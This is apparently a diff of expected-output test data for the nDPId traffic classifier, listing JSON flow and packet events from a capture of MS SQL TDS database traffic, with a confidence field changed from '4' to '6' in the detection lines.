00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7580000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} 00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7580000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7580000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\/wkE0AA0BCAAAAAAAAAEIAAAUwB0AHUAZABlAG4AYwBrAGkAZQAgAEsAbwBCAW8AIABQAHIAegBlAHcAbwBkAG4AaQBrAPMAdwAgAFQAdQByAHkAcwB0AHkAYwB6AG4AeQBjAGgAIAB3ACAARwBkAGEARAFzAGsAdQAKAHoAYQBwAHIAYQBzAHoAYQAgAG4AYQA6AAoAWABYAFgAVgAgAE4AbwBjAG4AZQAgAE0AYQByAHMAegBlACAAbgBhACAATwByAGkAZQBuAHQAYQBjAGoAGQEgACIARABhAHIAfAFsAHUAYgAiAAoAMAA0AC8AMAA1ACAAZwByAHUAZABuAGkAYQAgADIAMAAxADAACgAKAFcAcwB0ABkBcAAKAAoATgBvAGMAbgBlACAATQBhAHIAcwB6AGUAIABuAGEAIABPAHIAaQBlAG4AdABhAGMAagAZASAAIgBEAGEAcgB8AWwAdQBiACIAIABzAAUBIAB0AHUAcgB5AHMAdAB5AGMAegBuAAUBIABpAG0AcAByAGUAegAFASAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgACgASQBuAE8AKQAsACAAdwAgAGsAdADzAHIAZQBqACAAdQBjAHoAZQBzAHQAbgBpAGMAeQAgAG0AYQBqAAUBIAB6AGEAIAB6AGEAZABhAG4AaQBlACAAcABvAHQAdwBpAGUAcgBkAHoAaQAHASAAdwAgAG8AawByAGUAWwFsAG8AbgB5AG0AIABsAGkAbQBpAGMAaQBlACAAYwB6AGEAcwB1ACAAcwB3AG8AagAFASAAbwBiAGUAYwBuAG8AWwEHASAAcAByAHoAeQAgAHUAcwB0AGEAdwBpAG8AbgB5AGMAaAAgAHcAIAB0AGUAcgBlAG4AaQBlACAAcAB1AG4AawB0AGEAYwBoACAAawBvAG4AdAByAG8AbABuAHkAYwBoAC4AIABOAGEAIABkAGEAbgBlAGoAIAB0AHIAYQBzAGkAZQAgAHoAdwB5AGMAaQAZAXwBYQAgAHoAZQBzAHAA8wBCASwAIABrAHQA8wByAHkAIAB6AGEAIABwAG8AawBvAG4AYQBuAGkAZQAgAHQAcgBhAHMAeQAgAHUAegB5AHMAawBhAEIBIABuAGEAagBtAG4AaQBlAGoAcwB6AAUBIABsAGkAYwB6AGIAGQEgAHAAdQBuAGsAdADzAHcAIABrAGEAcgBuAHkAYwBoAC4AIABVAGMAegBlAHMAdABuAGkAawDzAHcAIABvAGIAbwB3AGkABQF6AHUAagBlACAAegBtAG8AZAB5AGYAaQBrAG8AdwBhAG4AeQAgAHIAZQBnAHUAbABhAG0AaQBuACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AGMAaAAgAGkAbQBwAHIAZQB6ACAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgAFAAVABUAEsALgAKAAoAVAB5AG0AIAByAGEAegBlAG0AIAB0AG8AdwBhAHIAegB5AHMAegB5AAcBIABuAGEAbQAgAGIAGQFkAHoAaQBlACAAYQBnAGUAbgB0ACAAMAAwADcALAAgAEoAYQBtAGUAcwAgAEIAbwBuAGQALgAgAFoAZABvAGIABQFkAHoBYwBpAGUAIABsAGkAYwBlAG4AYwBqABkBIABuAGEAIAB6AGEAYgBCAQUBZAB6AGUAbgBpAGUAIQAKAAoASgBhAGsAIABjAG8AIAByAG8AawB1ACAAbwBkAGIAGQFkAHoAaQBlACAAcwBpABkBIABrAG8AbgBrAHUAcgBzACAAbgBhACAAbgBhAGoAbAA="} 02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\/vKFNgAAZQBwAHMAegAFASAAbgBhAHoAdwAZASAAegBlAHMAcABvAEIBdQAgAG4AYQB3AGkABQF6AHUAagAFAWMABQEgAGQAbwAgAHQAZQBtAGEAdAB1ACAAcAByAHoAZQB3AG8AZABuAGkAZQBnAG8AIABpAG0AcAByAGUAegB5AC4ACgAKADEALgAgAE8AcgBnAGEAbgBpAHoAYQB0AG8AcgAgAGkAbQBwAHIAZQB6AHkACgAKAFMAdAB1AGQAZQBuAGMAawBpAGUAIABLAG8AQgFvACAAUAByAHoAZQB3AG8AZABuAGkAawDzAHcAIABUAHUAcgB5AHMAdAB5AGMAegBuAHkAYwBoACAAdwAgAEcAZABhAEQBcwBrAHUALAAgAGQAegBpAGEAQgFhAGoABQFjAGUAIABwAHIAegB5ACAATwBkAGQAegBpAGEAbABlACAAUwB0AHUAZABlAG4AYwBrAGkAbQAgAFAAVABUAEsALgAKAEEAZAByAGUAcwA6ACAAdQBsAC4AIABTAGkAZQBkAGwAaQBjAGsAYQAgADQALAAgADgAMAAtADIAMgAyACAARwBkAGEARAFzAGsALAAgAGUALQBtAGEAaQBsADoAIABzAGsAcAB0AEAAcwBrAHAAdAAuAGcAZABhAG4AcwBrAC4AcABsACwAIAB3AHcAdwAuAHMAawBwAHQALgBnAGQAYQBuAHMAawAuAHAAbAAKAAoAMgAuACAAVwBzAHAA8wBCAXAAcgBhAGMAYQAgAGkAIABzAHAAbwBuAHMAbwByAHoAeQAKAAoAIAAgACAAIAAqACAAZgBpAHIAbQBhACAAYwBhAHQAZQByAGkAbgBnAG8AdwBhACAAWQBlAGwAbABvAHcAIABDAGEAdABlAHIAaQBuAGcACgAgACAAIAAgACoAIABTAHQAbwB3AGEAcgB6AHkAcwB6AGUAbgBpAGUAIABOAGEAIABSAHoAZQBjAHoAIABSAGEAdABvAHcAbgBpAGMAdAB3AGEAIABBAGQAaQB1AHQAYQByAGUACgAgACAAIAAgACoAIABwAHIAbwBkAHUAYwBlAG4AdAAgAFsBcABpAHcAbwByAPMAdwAgAGkAIABvAGQAegBpAGUAfAF5ACAAcAB1AGMAaABvAHcAZQBqACAAUgBvAGIAZQByAHQAJwBzACAATwB1AHQAZABvAG8AcgAgAEUAcQB1AGkAcABtAGUAbgB0AAoAIAAgACAAIAAqACAAcwBrAGwAZQBwACAAegAgAG8AZAB6AGkAZQB8AQUBIABpACAAcwBwAHIAegAZAXQAZQBtACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AG0AIABUAHIAZQBrAAoAIAAgACAAIAAqACAAVwB5AGQAYQB3AG4AaQBjAHQAdwBvACAARQBrAG8ALQBLAGEAcABpAG8AIABQAGkAbwB0AHIAIABLAGEAcABjAHoAeQBEAXMAawBpAAoAIAAgACAAIAAqACAAUwBrAGwAZQBwACAAZwDzAHIAcwBrAGkAIABFAC0AcABhAG0AaQByAC4AcABsAAoAIAAgACAAIAAqACAAVABlAGEAdAByACAATQBpAGUAagBzAGsAaQAgAHcAIABHAGQAeQBuAGkAIABpAG0ALgAgAFcALgAgAEcAbwBtAGIAcgBvAHcAaQBjAHoAYQAKACAAIAAgACAAKgAgAFcAcwBwAGkAbgBhAGwAbgBpAGEAIABBAGwAZgBhACAAQwBlAG4AdAByAHUAbQAKACAAIAAgACAAKgAgAFAAaQBlAGsAYQByAG4AaQBhAC0AQwB1AGsAaQBlAHIAbgBpAGEAIABLAHIAYQBzAGsAbwB3AHMAawBpAAoACgAKADMALgAgAE4AbwB3AG8AWwFjAGkAIAB3ACAAdABlAGoAIABlAGQAeQBjAGoAaQAKAAoAIAA="} 02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="} 